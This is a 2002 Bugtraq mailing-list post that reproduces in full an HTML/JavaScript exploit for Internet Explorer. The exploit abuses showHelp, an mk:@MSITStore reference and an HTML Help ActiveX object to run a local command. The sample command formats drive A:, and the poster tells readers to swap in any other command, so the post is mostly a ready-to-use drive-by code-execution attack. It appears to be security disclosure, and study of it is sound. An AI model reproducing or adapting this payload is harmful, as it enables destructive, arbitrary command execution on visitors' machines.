[27912] in bugtraq
Re: ZDnet forum: IE formatting local drive
daemon@ATHENA.MIT.EDU (Gossi The Dog)
Sun Nov 17 15:47:32 2002
Message-ID: <2221.194.129.200.1.1037273710.squirrel@www.lab6.com>
Date: Thu, 14 Nov 2002 11:35:10 -0000 (GMT)
From: "Gossi The Dog" <gossi@lab6.com>
To: <bugtraq@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
FYI, the HTML code is;
------------------------------------------------------------------------
<html>
<head>
</head>
<script LANGUAGE="JavaScript">
prog = 'command';
args = '/k format a: /autotest';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();c3.Click();");
close();
}
</script>
<body>
<h1>Testing IE Execute Exploit</h1>
</body>
</html>
-----------------------------------------------------------------------
Change 'args' to a different command (/autotest doesn't work well on
Windows 2000, for example).
Oh dear.
Gossi
